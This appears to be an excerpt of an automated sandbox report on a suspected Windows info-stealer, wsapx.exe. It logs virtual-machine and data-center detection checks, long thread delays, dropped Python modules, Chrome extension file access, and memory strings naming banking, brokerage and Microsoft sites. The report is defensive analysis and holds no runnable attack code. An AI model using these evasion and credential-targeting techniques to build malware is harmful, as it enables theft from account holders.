Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7743	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1384	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7757	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1353	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7335
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2284
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1573
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3943
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3195
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4550
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2718
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3662

Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_decimal.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\python312.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_socket.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_queue.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uses4c50\uses4c50.dll	Jump to dropped file
Source: C:\Users\user\Desktop\wsapx.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73722\_sqlite3.pyd	Jump to dropped file

Source: C:\Users\user\Desktop\wsapx.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-18247

Source: C:\Users\user\Desktop\wsapx.exe

API coverage: 5.8 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 7743 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988	Thread sleep count: 1384 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040	Thread sleep time: -10145709240540247s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep count: 7757 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7972	Thread sleep count: 1353 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8020	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5144	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636	Thread sleep count: 7335 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep count: 2284 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7412	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7856	Thread sleep count: 1573 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7684	Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988	Thread sleep count: 3943 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5988	Thread sleep count: 3195 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7280	Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep count: 4550 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808	Thread sleep count: 2718 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5764	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8016	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612	Thread sleep count: 3662 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2612	Thread sleep count: 308 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7776	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\reg.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\tree.com	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF7C71B83B0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,	0_2_00007FF7C71B92F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 0_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF7C71D18E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71B92F0 FindFirstFileExW,FindClose,	2_2_00007FF7C71B92F0
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71D18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF7C71D18E4
Source: C:\Users\user\Desktop\wsapx.exe	Code function: 2_2_00007FF7C71B83B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF7C71B83B0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5E46EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF60E5E46EC
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E6288E0 FindFirstFileExA,	110_2_00007FF60E6288E0
Source: C:\Users\user\AppData\Local\Temp\_MEI73722\rar.exe	Code function: 110_2_00007FF60E5DE21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF60E5DE21C

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 2_2_00007FFD94750180 GetSystemInfo,

2_2_00007FFD94750180

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\wsapx.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: wsapx.exe, 00000002.00000002.2652361959.000001C879844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3404666064.00000266ED243000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.3404815649.00000266ED255000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: svchost.exe, 00000017.00000002.3401548411.00000266E7A2B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: qemu-ga
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware)
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport^
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: d00qemu-ga
Source: getmac.exe, 00000053.00000003.2388318674.000002A8F57EB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000002.2390297595.000002A8F57EC000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: wsapx.exe, 00000002.00000003.2416284679.000001C87AA73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Bz6uGXB1DV0nbobJw9jhNYa0gG/En+48ZFhmCFIXmuZoqiopbM5c3YRODtzXlizVX/mAitADqNeW5oaJtWpjpinGWLCK8urG3jKNN0mmupGvcU5HlXybvdFUXWgqEhdpkMfvjkkaEbCSfMYSxkL4HWyoXAB1G5hDlqeMuUnwsej
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: $*fytesvmsrvc
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: wsapx.exe, 00000002.00000002.2657140825.000001C87AAA5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2644095050.000001C87AA7D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2416284679.000001C87AA7D000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2656467781.000001C87AA7F000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2416284679.000001C87AAA5000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000003.2353669129.000001C879FD2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: foadsvmware
Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp, wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: *f4vmusrvc
Source: wsapx.exe, 00000002.00000003.2178007249.000001C879DFF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicer_
Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57D3000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: wsapx.exe, 00000002.00000002.2652913011.000001C879C30000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: getmac.exe, 00000053.00000002.2390297595.000002A8F57AF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000053.00000003.2388039306.000002A8F57AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: wsapx.exe, 00000002.00000003.2414327956.000001C87AB04000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 0_2_00007FF7C71CA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF7C71CA684

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 2_2_00007FFD93D97B30 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FFD93D97B30

Source: C:\Users\user\Desktop\wsapx.exe

Code function: 0_2_00007FF7C71D34F0 GetProcessHeap,

